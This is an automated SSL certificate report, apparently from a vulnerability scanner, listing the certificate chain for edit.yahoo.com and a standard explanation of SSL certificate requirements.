The server presented the following certificates:

Server certificate

Issued to:	edit.yahoo.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Wed May 19 03:54:49 CDT 2010
Valid to:	Wed Jun 19 17:41:46 CDT 2013

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:08:59 CST 2011.